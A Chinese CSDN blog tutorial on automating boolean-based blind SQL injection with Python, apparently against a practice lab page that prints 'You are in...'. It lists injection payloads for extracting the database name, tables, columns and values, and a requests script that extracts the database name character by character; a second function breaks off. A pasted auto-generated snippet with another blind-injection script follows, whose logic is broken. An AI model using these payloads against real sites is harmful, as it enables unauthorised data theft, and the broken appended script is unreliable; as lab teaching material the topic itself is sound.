Python自动化sql注入:布尔盲注_布尔盲注脚本

单引号就能闭合,结果正常时会显示you are in…,结果不正常什么都没有。

所以我们只需要根据是否有you are in来判断注入成功与否,构造语句如下:

# 判断数据库名长度
/?id=1' and length((select database()))=8--+

# 挨个判断数据库名
/?id=1' and ascii(substr((select database()),1,1))=115--+
# 第一位为's'
/?id=1' and ascii(substr((select database()),2,1))=102--+
# 第二位为'e'
...

# 判断表名
/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102--+

# 判断字段名
/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='表名' limit 1,1),1,1))=102--+

# 判断值
/?id=1' and ascii(substr((select 字段 from 表 limit 1,1),1,1))=1--+

python脚本自动化

可以看到手注需要一个一个试工作量是非常非常巨大的,这时候一个python脚本就可以很好的解放我们的双手:

需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…":

import requests


requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
flag = 'You are in...'

获取数据库相关信息:

def GetDBName(url):
    DBName = ''
    print("开始获取数据库名长度...")
    len = 0
    for l in range(1,99):
        payload = f"' and length((select database()))={l}--+"
        res = conn.get(url=url+payload)
        if flag in res.content.decode("utf-8"):
            print("数据库名长度为:"+str(l))
            len = l
            break
    print("开始获取数据库名...")
    for i in range(1, len+1):
        for j in range(33,127):
            payload = f"' and ascii(substr((select database()),{i},1))={j}--+"
            res = conn.get(url=url+payload)
            if flag in res.content.decode("utf-8"):
                DBName += chr(j)
                print(DBName)
                break
    return DBName

将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。运行结果如下所示:

接下来就是获取表、字段以及其中的具体数据了,写下去你会发现总体流程都是一样的,以表为例,大致步骤如下:

获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名

代码如下:

def GetTables(url,db):
    print("正在获取数据表数量")
    tnum = 0


![在这里插入图片描述](https://img-blog.csdnimg.cn/20210511152217670.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3poaWd1aWd1,size_16,color_FFFFFF,t_70)

**感谢每一个认真阅读我文章的人,看着粉丝一路的上涨和关注,礼尚往来总是要有的:**



① 2000多本Python电子书(主流和经典的书籍应该都有了)

② Python标准库资料(最全中文版)

③ 项目源码(四五十个有趣且经典的练手项目及源码)

④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)

⑤ Python学习路线图(告别不入流的学习)




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化学习资料的朋友,可以戳这里无偿获取](https://bbs.csdn.net/topics/618317507)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
布尔是一种注入攻击技术,它利用了应用程序对数据库是否返回正确或错误的响应来获取敏感信息。在Python中实现布尔可以通过发送恶意注入字符串并观察响应来判断条件是否为真或为假。 一种常见的方法是通过发送特定的SQL语句,如UNION SELECT语句或布尔表达式,来获取数据库中的信息。在布尔中,我们通过不断尝试不同的条件,观察应用程序的响应是否发生变化来推测正确的条件。 下面是一个简单的Python脚本示例,用于实现布尔: ```python import requests def is_true(payload): url = "http://example.com/vulnerable_page" response = requests.get(url + "?param=" + payload) if "True condition" in response.text: return True else: return False def blind_sql_injection(): result = "" for i in range(1, 10): payload = f"1' OR (SELECT SUBSTRING(database(), {i}, 1)='x') --" if is_true(payload): result += chr(i) else: break return result database_name = blind_sql_injection() print(database_name) ``` 在这个示例中,我们使用了requests库发送GET请求,并在payload中注入了恶意字符串。通过不断尝试不同的条件,我们可以逐个字符地获取数据库名。 请意,这只是一个简单的示例,实际的布尔攻击可能需要更复杂的技术和策略。同时,务必遵守法律和道德准则,在授权范围内使用布尔技术。<span class="em">1</span> #### 引用[.reference_title] - *1* [布尔python脚本](https://download.csdn.net/download/qq_46145027/87716310)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值